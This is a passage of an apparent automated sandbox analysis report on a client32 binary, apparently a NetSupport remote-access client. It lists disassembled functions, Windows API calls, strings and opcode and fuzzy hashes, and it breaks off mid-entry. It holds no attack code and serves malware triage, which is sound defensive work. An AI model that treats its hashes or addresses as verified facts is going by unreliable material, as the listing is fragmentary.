                                                                                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                    • API String ID: 3234921582-2664294811
                                                                                                                                                    • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                                                                                    • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                                                                    • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                                                                                    • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                                                                    Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                      • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                    • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                                                                    • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                                                                    • API String ID: 1108920153-1959555903
                                                                                                                                                    • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                                                    • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                                                                                                    • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                                                    • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                                                                                                    Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wsprintfA.USER32 ref: 11031FE6
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                    • String ID: %s%s.bin$358075$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                    • API String ID: 4180936305-419004844
                                                                                                                                                    • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                                                                                    • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                                                                                                    • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                                                                                    Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                                                                    • __strdup.LIBCMT ref: 11145277
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                      • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                                                                    • _free.LIBCMT ref: 111452AC
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 398584587-0
                                                                                                                                                    • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                                                                    • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                                                                    • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                                                                    • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                                                                    Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                                                                      • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                                                                    • _free.LIBCMT ref: 1100EE64
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _free.LIBCMT ref: 1100EE77
                                                                                                                                                    • _free.LIBCMT ref: 1100EE8A
                                                                                                                                                    • _free.LIBCMT ref: 1100EE9D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3515823920-0
                                                                                                                                                    • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                                                    • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                                                                    • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                                                    • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                                                                    Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                    • wsprintfA.USER32 ref: 1114650E
                                                                                                                                                    • wsprintfA.USER32 ref: 11146524
                                                                                                                                                      • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                                                                                      • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                                                      • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                                                                    • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                                                                    • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                                                                                    • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                                                                                                    • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                                                                                    Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                                                                                    • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3550192930-0
                                                                                                                                                    • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                                                    • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                                                                    • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                                                                                                    • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                                                                    Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 1443461169-123907689
                                                                                                                                                    • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                                    • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                                                    • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                                    • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                                                    Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1EF76653,75732EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                      • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                                                                    • String ID: Client$DisableGeolocation
                                                                                                                                                    • API String ID: 3315423714-4166767992
                                                                                                                                                    • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                                                                                    • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                                                                                    • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                                                                                                    • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                                                                                    Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
